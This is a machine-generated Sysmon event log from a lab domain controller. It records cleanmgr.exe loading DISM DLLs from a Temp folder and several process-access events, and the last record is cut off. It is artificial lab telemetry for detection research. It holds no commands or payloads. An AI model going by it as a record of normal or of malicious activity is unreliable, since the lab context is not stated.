11241100x80000000000000001050699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.744{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-console-l1-1-0.dll2021-07-12 07:56:58.743 11241100x80000000000000001050698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.742{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-comm-l1-1-0.dll2021-07-12 07:56:58.742 11241100x80000000000000001050697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.742{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-core-com-l1-1-0.dll2021-07-12 07:56:58.742 11241100x80000000000000001050696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.741{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-base-util-l1-1-0.dll2021-07-12 07:56:58.740 11241100x80000000000000001050695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.735{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\WimProvider.dll2021-07-12 07:56:58.735 11241100x80000000000000001050694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.734{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\VhdProvider.dll2021-07-12 07:56:58.734 11241100x80000000000000001050693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.734{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\UnattendProvider.dll2021-07-12 07:56:58.734 11241100x80000000000000001050692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.733{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\TransmogProvider.dll2021-07-12 07:56:58.733 11241100x80000000000000001050691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.732{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\SmiProvider.dll2021-07-12 07:56:58.732 11241100x80000000000000001050690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.731{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ProvProvider.dll2021-07-12 07:56:58.730 11241100x80000000000000001050689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.730{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OSProvider.dll2021-07-12 07:56:58.729 11241100x80000000000000001050688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.729{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OfflineSetupProvider.dll2021-07-12 07:56:58.729 11241100x80000000000000001050687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.728{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\MsiProvider.dll2021-07-12 07:56:58.728 11241100x80000000000000001050686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.727{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\LogProvider.dll2021-07-12 07:56:58.727 11241100x80000000000000001050685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.726{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IntlProvider.dll2021-07-12 07:56:58.726 11241100x80000000000000001050684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.725{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ImagingProvider.dll2021-07-12 07:56:58.725 11241100x80000000000000001050683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.725{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IBSProvider.dll2021-07-12 07:56:58.725 11241100x80000000000000001050682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.724{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\GenericProvider.dll2021-07-12 07:56:58.724 11241100x80000000000000001050681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.723{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FolderProvider.dll2021-07-12 07:56:58.723 11241100x80000000000000001050680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.723{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FfuProvider.dll2021-07-12 07:56:58.722 23542300x80000000000000001050679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3CFDDAEA0C7BC29E1228F9865C8F0F,SHA256=7C64F00727D5DA0BC3C9997160E6641D994606BA040BD797B5415B1A21C0293F,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.686{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DmiProvider.dll2021-07-12 07:56:58.686 11241100x80000000000000001050677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.685{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismProv.dll2021-07-12 07:56:58.685 11241100x80000000000000001050676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:56:58.684{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exe2021-07-12 07:56:58.684 11241100x80000000000000001050675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.683{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCorePS.dll2021-07-12 07:56:58.683 11241100x80000000000000001050674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.682{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCore.dll2021-07-12 07:56:58.682 11241100x80000000000000001050673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.682{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CompatProvider.dll2021-07-12 07:56:58.682 354300x80000000000000001050672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.186{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57326-false10.0.1.14win-dc-890.attackrange.local49676- 11241100x80000000000000001050671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CbsProvider.dll2021-07-12 07:56:58.665 11241100x80000000000000001050670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AssocProvider.dll2021-07-12 07:56:58.665 11241100x80000000000000001050669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localDLL2021-07-12 07:56:58.665{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AppxProvider.dll2021-07-12 07:56:58.665 10341000x80000000000000001050668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.602{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.533{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.533{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.502{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=753197458FDE1D6CC0CF5F1EA1EBF811,SHA256=09A8F8D1AE2D773C1A54B08FECDF87CFF7A0DC2CC2517591B6F0464CCD8F980E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.433{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.433{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.385{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.384{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.349{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.333{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.333{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.333{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6B7D-00000000CF01}1076C:\Windows\system32\cleanmgr.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.286{466BC892-32D3-60E8-770B-00000000CF01}635610084C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.233{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.233{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5CA-60EB-6C7D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-6D7D-00000000CF01}8436C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:58.219{466BC892-F5CA-60EB-6C7D-00000000CF01}766810116C:\Windows\system32\conhost.exe{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 